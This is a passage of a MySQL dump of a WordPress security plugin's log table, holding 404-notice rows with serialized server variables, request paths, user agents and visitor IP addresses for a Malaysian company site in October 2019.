:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZq4hlB148AIihBft5ND4AAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570420870.9631\";s:12:\"REQUEST_TIME\";s:10:\"1570420870\";}}','notice','2019-10-07 04:01:13','2019-10-07 04:01:11',35418472,37234240,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(27615,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"190.107.19.166\";s:11:\"REMOTE_PORT\";s:5:\"50065\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqtIVB148AIihBft5M7uAAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570417953.9781\";s:12:\"REQUEST_TIME\";s:10:\"1570417953\";}}','notice','2019-10-07 03:12:37','2019-10-07 03:12:34',35419976,37223792,'https://bintara.com.my/?page_id=18',1,0,'190.107.19.166'),(27616,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/post_tag-sitemap.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/post_tag-sitemap.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/post_tag-sitemap.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZqzcVB148AIihBft5NAPAAAAFg\";s:12:\"REDIRECT_URL\";s:21:\"/post_tag-sitemap.xml\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.134\";s:11:\"REMOTE_PORT\";s:4:\"4891\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/post_tag-sitemap.xml\";s:10:\"SCRIPT_URL\";s:21:\"/post_tag-sitemap.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqzcVB148AIihBft5NAPAAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570419569.4288\";s:12:\"REQUEST_TIME\";s:10:\"1570419569\";}}','notice','2019-10-07 03:39:31','2019-10-07 03:39:29',33741016,35548184,'https://bintara.com.my/post_tag-sitemap.xml',1,0,'207.46.13.134'),(27614,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.136.178\";s:11:\"REMOTE_PORT\";s:5:\"54592\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqspVB148AIihBft5M7JAAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570417829.6776\";s:12:\"REQUEST_TIME\";s:10:\"1570417829\";}}','notice','2019-10-07 03:10:32','2019-10-07 03:10:30',35025816,36842152,'https://bintara.com.my/?page_id=18',1,0,'108.161.136.178');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (27613,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B352071A-64AE-418B-86FC-C37B192697B1\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZqbP8AZj7RBQ-icbk@@wQAAAM8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.118.115\";s:11:\"REMOTE_PORT\";s:5:\"50274\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqbP8AZj7RBQ-icbk@@wQAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570413375.6342\";s:12:\"REQUEST_TIME\";s:10:\"1570413375\";}}','notice','2019-10-07 01:56:18','2019-10-07 01:56:16',35389896,37184840,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.115'),(27612,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/blog/tag/logitech-rally/feed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/blog/tag/logitech-rally/feed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/blog/tag/logitech-rally/feed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZqPP3KWq-OQ7bMwJVWwmQAAAVA\";s:12:\"REDIRECT_URL\";s:30:\"/blog/tag/logitech-rally/feed/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.166\";s:11:\"REMOTE_PORT\";s:5:\"11421\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/blog/tag/logitech-rally/feed/\";s:10:\"SCRIPT_URL\";s:30:\"/blog/tag/logitech-rally/feed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqPP3KWq-OQ7bMwJVWwmQAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570410303.2618\";s:12:\"REQUEST_TIME\";s:10:\"1570410303\";}}','notice','2019-10-07 01:05:06','2019-10-07 01:05:03',34365968,36172664,'https://bintara.com.my/blog/tag/logitech-rally/feed/',1,0,'157.55.39.166'),(27610,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4091.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"112.218.73.138\";s:11:\"REMOTE_PORT\";s:5:\"37371\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqKwIMFLk21hQvqQVvDzQAAAco\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570409152.367\";s:12:\"REQUEST_TIME\";s:10:\"1570409152\";}}','notice','2019-10-07 00:45:54','2019-10-07 00:45:52',35025240,36829640,'https://bintara.com.my/?page_id=18',1,0,'112.218.73.138'),(27611,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"41A0DC98-4B65-42FB-998A-8C13DDB625A7\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZqLEMAZj7RBQ-icbk@5HQAAAMo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.118.115\";s:11:\"REMOTE_PORT\";s:5:\"49874\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqLEMAZj7RBQ-icbk@5HQAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570409232.8216\";s:12:\"REQUEST_TIME\";s:10:\"1570409232\";}}','notice','2019-10-07 00:47:14','2019-10-07 00:47:13',35389544,37188656,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.115'),(27609,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/blog/portfolio/broadbase/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/blog/portfolio/broadbase/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/blog/portfolio/broadbase/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZqI6IMFLk21hQvqQVvB@QAAAdE\";s:12:\"REDIRECT_URL\";s:26:\"/blog/portfolio/broadbase/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.17\";s:11:\"REMOTE_PORT\";s:4:\"6624\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/blog/portfolio/broadbase/\";s:10:\"SCRIPT_URL\";s:26:\"/blog/portfolio/broadbase/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqI6IMFLk21hQvqQVvB@QAAAdE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570408680.7445\";s:12:\"REQUEST_TIME\";s:10:\"1570408680\";}}','notice','2019-10-07 00:38:02','2019-10-07 00:38:01',33962496,35766128,'https://bintara.com.my/blog/portfolio/broadbase/',1,0,'40.77.167.17'),(27607,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"191.96.242.118\";s:11:\"REMOTE_PORT\";s:5:\"58319\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqEsHKWq-OQ7bMwJVWueQAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUE